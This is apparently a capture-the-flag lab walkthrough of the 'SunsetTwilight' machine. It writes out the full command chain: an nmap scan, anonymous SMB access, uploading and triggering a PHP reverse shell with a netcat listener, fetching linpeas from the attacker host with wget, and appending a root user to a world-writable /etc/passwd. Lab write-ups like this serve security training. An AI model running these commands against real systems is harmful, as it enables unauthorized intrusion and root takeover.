SunsetTwilight

Nmap

sudo nmap 192.168.120.91 -p- -sS -sV                                                                

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp    open  smtp        Exim smtpd
80/tcp    open  http        Apache httpd 2.4.38 ((Debian))
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2121/tcp  open  ftp         pyftpdlib 1.5.6
3306/tcp  open  mysql       MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
8080/tcp  open  http        PHP cli server 5.5 or later
63525/tcp open  http        PHP cli server 5.5 or later
Service Info: Host: TWILIGHT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

First up is checking SMB. We are able to connect and list shared without providing credentials as shown below:

smbclient -U '' -L \\\\192.168.120.91\\ 

We can then move into the WRKSHARE directory to view the contents:

smbclient -U '' \\\\192.168.120.91\\WRKSHARE\\

As this looks like we can see the entire directory from '/' we can have a look about for interesting information. We know that port 80 is open so likely we are running a webserver.

Looking at the contents of the directory /var/www/html/ we can see PHP files.

If we can upload a reverse PHP shell we should in theory be able to get shell access. I used the following command to upload a PHP reverse shell with curl into the /var/www/html directory:

curl --upload-file /home/kali/scripts/phpshell.php -u '' smb://192.168.120.91/WRKSHARE/var/www/html/phpshell.php

Checking the directory contents with smbclient again shows we have uploaded our PHP reverse shell.

We can then set a netcat listener up then execute the shell with curl.

sudo nc -lvp 80
curl http://192.168.120.91/phpshell.php 

The current shell can then be improved by:

python -c 'import pty; pty.spawn("/bin/bash")'

Next we can move into the /tmp/ directory. Started a Python SimpleHTTPServer on my attacking machine and transferred over linpeas.

wget http://192.168.49.120/linpeas.sh

linpeas picks up that /etc/passwd is writeable by everyone. Which means we can make changes to the file.

As such we can add a new root user to the target machine to gain root access.

Generate password on attacking machine:

openssl passwd -1 -salt password password 

Echo the password and new user to the end of /etc/passwd on the target machine.

echo 'owned:$1$password$Da2mWXlxe6J7jtww12SNG/:0:0:owned:/root:/bin/bash' >> /etc/passwd

We can then use su to move into the new account and gain a root shell.